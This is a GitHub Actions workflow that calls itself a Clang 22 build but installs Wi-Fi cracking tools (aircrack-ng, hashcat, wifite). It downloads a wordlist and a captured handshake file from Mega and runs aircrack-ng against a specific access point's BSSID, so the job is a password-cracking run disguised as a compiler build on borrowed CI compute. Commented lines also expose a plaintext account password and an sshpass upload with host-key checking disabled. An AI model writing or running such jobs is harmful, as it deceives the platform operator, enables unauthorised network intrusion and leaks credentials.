name: Build Clang

on: [push]

jobs:
  build:
    runs-on: ubuntu-22.04

    steps:
    - uses: actions/checkout@v2

    - name: Install dependencies
      run: |
        sudo apt-get update
        sudo apt-get install -y bc \
            aircrack-ng \
            zip \
            ruby \
            hashcat \
            wifite \
            wget \
            megatools

    - name: Build Clang 22.0.0 init
      run: |
        sudo fallocate -l 8G /swapfile
        sudo chmod 600 /swapfile
        sudo mkswap /swapfile
        sudo swapon /swapfile
        mkdir hs
        cd hs
        #wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
        megadl https://mega.nz/file/q8NCgbTB#pjYVG7Im8vppjUYh1OjwDhYw4AlC8y8wuX0vvqnSpJQ
        tar -xf ind.tar.gz
        cd ind
        megadl https://mega.nz/file/uoMjmbSD#9kmnD7PHFVBTD--HUr8ZIyunMeuin_CGo_-X0j0zD2I
        sudo aircrack-ng -q -w *.lst -b 58:D3:12:CC:E1:F5 wr.cap /dev/null 2>&1
        #FILE="clang22-131025.tar.zst"
        #USER="onettboots"
        #PASSWORD="Nazma4242@"
        #HOST="frs.sourceforge.net"
        #REMOTE_DIR="/home/frs/project/boolx/clang/"
        #sshpass -p "$PASSWORD" scp -o StrictHostKeyChecking=no "$FILE" "$USER@$HOST:$REMOTE_DIR"
